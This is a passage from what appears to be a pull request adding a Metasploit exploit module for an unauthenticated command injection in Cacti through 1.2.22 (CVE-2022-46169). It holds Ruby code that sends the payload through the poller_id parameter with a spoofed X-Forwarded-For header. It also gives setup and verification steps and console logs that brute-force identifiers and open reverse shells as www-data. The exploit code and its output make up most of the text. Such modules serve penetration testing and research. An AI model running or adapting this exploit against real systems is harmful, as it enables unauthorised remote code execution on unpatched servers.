+      print_status('Executing the payload. This may take a few seconds...')
+      execute_command(payload.encoded)
+    else
+      execute_cmdstager(background: true)
+    end
+  end
+
+  def remote_agent_request(ld_id, h_id, poller_id)
+    {
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'remote_agent.php'),
+      'headers' => {
+        'X-Forwarded-For' => x_forwarded_for_ip
+      },
+      'vars_get' => {
+        'action' => 'polldata',
+        'local_data_ids[0]' => ld_id,
+        'host_id' => h_id,
+        'poller_id' => poller_id # when bruteforcing, this is a random number, but during exploitation this is the payload
+      }
+    }
+  end
+end

--- a/modules/exploits/linux/http/cacti_unauthenticated_cmd_injection.rb
+++ b/modules/exploits/linux/http/cacti_unauthenticated_cmd_injection.rb
@@ -45,6 +45,8 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'License' => MSF_LICENSE,
         'Author' => [
+          'Stefan Schiller', # discovery (independent of Steven Seeley)
+          'Steven Seeley', # (mr_me) @steventseeley - discovery (independent of Stefan Schiller)
           'Owen Gong', # @phithon_xg - vulhub PoC
           'Erik Wynter' # @wyntererik - Metasploit
         ],
@@ -91,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options([
       OptString.new('TARGETURI', [true, 'The base path to Cacti', '/']),
-      OptString.new('X_FORWARDED_FOR_IP', [true, 'The IP to use in the X-Forwared-For HTTP header. This should be resolvable to a hostname in the poller table.', '127.0.0.1']),
+      OptString.new('X_FORWARDED_FOR_IP', [true, 'The IP to use in the X-Forwarded-For HTTP header. This should be resolvable to a hostname in the poller table.', '127.0.0.1']),
       OptInt.new('HOST_ID', [false, 'The host_id value to use. By default, the module will try to bruteforce this.']),
       OptInt.new('LOCAL_DATA_ID', [false, 'The local_data_id value to use. By default, the module will try to bruteforce this.'])
     ])


### PR DESCRIPTION
## About
This change adds an exploit module and docs for an unauthenticated command injection vulnerability in Cacti through 1.2.22 (CVE-2022-46169).

## Vulnerable Application
Cacti through 1.2.22 is affected. However, the module has only been tested against 1.2.22.

## Installation Information
- Cacti is open source, and vulnerable versions can be obtained from the official GitHub repository under
[releases](https://github.com/Cacti/cacti/releases).
- As a shortcut, a vulhub entry is available [here](https://github.com/vulhub/vulhub/tree/master/cacti/CVE-2022-46169) that allows you to spin up a vulnerable instance via a single docker-compose command. The vulhub page also contains instructions for how to complete the Cacti installation, how to make it vulnerable, and a PoC.
- Additional details about the exploit are available [here](https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf)


## Verification Steps
1. Start msfconsole
2. Do: `use exploit/linux/http/cacti_unauthenticated_cmd_injection`
3. Do: `set RHOSTS [IP]`
4. Do: `set LHOST [IP]`
4. Do: `set SRVHOST [IP]`
5. Do: `exploit`

## Options
### TARGETURI
The base path to Cacti. The default value is `/`.
### HOST_ID
The `host_id` value to use. By default, the module will try to bruteforce this.
### LOCAL_DATA_ID
The `local_data_id` value to use. By default, the module will try to bruteforce this.
### X_FORWARDED_FOR_IP
The IP to use in the `X-Forwared-For` HTTP header. This should be resolvable to a hostname in the poller table. Default: 127.0.0.1

## Advanced Options
### MIN_HOST_ID
Lower value for the range of possible `host_id` values to check for. Default: 1
### MAX_HOST_ID
Upper value for the range of possible `host_id` values to check for. Default: 5
### MIN_LOCAL_DATA_ID
Lower value for the range of possible local_data_id values to check for. Default: 1
### MAX_LOCAL_DATA_ID
Upper value for the range of possible local_data_id values to check for. Default: 100

## Targets
```
Id  Name
--  ----
0   Automatic (Unix In-Memory)
1   Automatic (Linux Dropper)
```

## Scenarios
### Cacti 1.2.22 - Linux Dropper - HOST_ID and LOCAL_DATA_ID not set (bruteforce)
```
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > options 

Module options (exploit/linux/http/cacti_unauthenticated_cmd_injection):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   HOST_ID                              no        The host_id value to use. By default, the module will try to bruteforce this.
   LOCAL_DATA_ID                        no        The local_data_id value to use. By default, the module will try to bruteforce this.
   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS              192.168.91.195   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT               8080             yes       The target port (TCP)
   SRVHOST             192.168.91.195   yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all add
                                                  resses.
   SRVPORT             9090             yes       The local port to listen on.
   SSL                 false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                              no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI           /                yes       The base path to Cacti
   URIPATH                              no        The URI to use for this exploit (default is random)
   VHOST                                no        HTTP server virtual host
   X_FORWARDED_FOR_IP  127.0.0.1        yes       The IP to use in the X-Forwared-For HTTP header. This should be resolvable to a hostname in the poller table.


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.91.195   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Automatic (Linux Dropper)



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > run

[*] Started reverse TCP handler on 192.168.91.195:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is Cacti version 1.2.22
[*] Trying to bruteforce an exploitable host_id and local_data_id by trying up to 505 combinations
[*] Enumerating local_data_id values for host_id 1
[*] Performing request 25...
[*] Performing request 50...
[*] Performing request 75...
[+] Found exploitable local_data_id 180 for host_id 1
[*] Sending stage (1017704 bytes) to 10.18.0.3
[*] Command Stager progress - 100.00% done (773/773 bytes)
[*] Meterpreter session 1 opened (192.168.91.195:4444 -> 10.18.0.3:45322) at 2022-12-22 16:43:59 +0200

meterpreter > getuid
Server username: www-data
```

### Cacti 1.2.22 - Unix In-Memory - HOST_ID and LOCAL_DATA_ID set (immediate exploitation)
```
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > options 

Module options (exploit/linux/http/cacti_unauthenticated_cmd_injection):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   HOST_ID             1                no        The host_id value to use. By default, the module will try to bruteforce this.
   LOCAL_DATA_ID       182              no        The local_data_id value to use. By default, the module will try to bruteforce this.
   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS              192.168.91.195   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT               8080             yes       The target port (TCP)
   SRVHOST             192.168.91.195   yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all add
                                                  resses.
   SRVPORT             9090             yes       The local port to listen on.
   SSL                 false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                              no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI           /                yes       The base path to Cacti
   URIPATH                              no        The URI to use for this exploit (default is random)
   VHOST                                no        HTTP server virtual host
   X_FORWARDED_FOR_IP  127.0.0.1        yes       The IP to use in the X-Forwared-For HTTP header. This should be resolvable to a hostname in the poller table.


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.91.195   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > run

[*] Started reverse TCP handler on 192.168.91.195:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is Cacti version 1.2.22
[*] Executing the payload. This may take a few seconds...
[*] Command shell session 1 opened (192.168.91.195:4444 -> 10.18.0.3:50802) at 2022-12-22 16:51:46 +0200

uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

### Cacti 1.2.22 - Linux Dropper - HOST_ID and LOCAL_DATA_ID not set (bruteforce with undetermined result, then manual exploitation)
```
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > options 

Module options (exploit/linux/http/cacti_unauthenticated_cmd_injection):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   HOST_ID                              no        The host_id value to use. By default, the module will try to bruteforce this.
   LOCAL_DATA_ID                        no        The local_data_id value to use. By default, the module will try to bruteforce this.
   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS              192.168.91.195   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT               8080             yes       The target port (TCP)
   SRVHOST             192.168.91.195   yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all add
                                                  resses.
   SRVPORT             9090             yes       The local port to listen on.
   SSL                 false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                              no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI           /                yes       The base path to Cacti
   URIPATH                              no        The URI to use for this exploit (default is random)
   VHOST                                no        HTTP server virtual host
   X_FORWARDED_FOR_IP  127.0.0.1        yes       The IP to use in the X-Forwared-For HTTP header. This should be resolvable to a hostname in the poller table.


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.91.195   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Automatic (Linux Dropper)



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > run

[*] Started reverse TCP handler on 192.168.91.195:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is Cacti version 1.2.22
[*] Trying to bruteforce an exploitable host_id and local_data_id by trying up to 500 combinations
[*] Enumerating local_data_id values for host_id 1
[*] Performing request 25...
[*] Performing request 50...
[*] Performing request 75...
[*] Performing request 100...
[*] Enumerating local_data_id values for host_id 2
[*] Performing request 125...
[*] Performing request 150...
[*] Performing request 175...
[*] Performing request 200...
[*] Enumerating local_data_id values for host_id 3
[*] Performing request 225...
[*] Performing request 250...
[*] Performing request 275...
[*] Performing request 300...
[*] Enumerating local_data_id values for host_id 4
[*] Performing request 325...
[*] Performing request 350...
[*] Performing request 375...
[*] Performing request 400...
[*] Enumerating local_data_id values for host_id 5
[*] Performing request 425...
[*] Performing request 450...
[*] Performing request 475...
[*] Performing request 500...
[!] Identified 15 host_id - local_data_id combination(s) that may be exploitable, but could not be positively identified as such:
        host_id: 1 - local_data_id: 156
        host_id: 1 - local_data_id: 157
        host_id: 1 - local_data_id: 158
        host_id: 1 - local_data_id: 164
        host_id: 1 - local_data_id: 166
        host_id: 1 - local_data_id: 167
        host_id: 1 - local_data_id: 168
        host_id: 1 - local_data_id: 169
        host_id: 1 - local_data_id: 170
        host_id: 1 - local_data_id: 173
        host_id: 1 - local_data_id: 174
        host_id: 1 - local_data_id: 175
        host_id: 1 - local_data_id: 176
        host_id: 1 - local_data_id: 177
        host_id: 1 - local_data_id: 178
[*] You can try to exploit these by manually configuring the HOST_ID and LOCAL_DATA_ID options
[-] Exploit aborted due to failure: no-target: Failed to identify an exploitable host_id - local_data_id combination.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > set host_id 1
host_id => 1
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > set local_data_id 156
local_data_id => 156
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > run

[*] Started reverse TCP handler on 192.168.91.195:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is Cacti version 1.2.22
[*] Sending stage (1017704 bytes) to 10.18.0.3
[*] Command Stager progress - 100.00% done (773/773 bytes)
[*] Meterpreter session 2 opened (192.168.91.195:4444 -> 10.18.0.3:54964) at 2022-12-22 16:56:42 +0200

meterpreter > getuid
Server username: www-data
```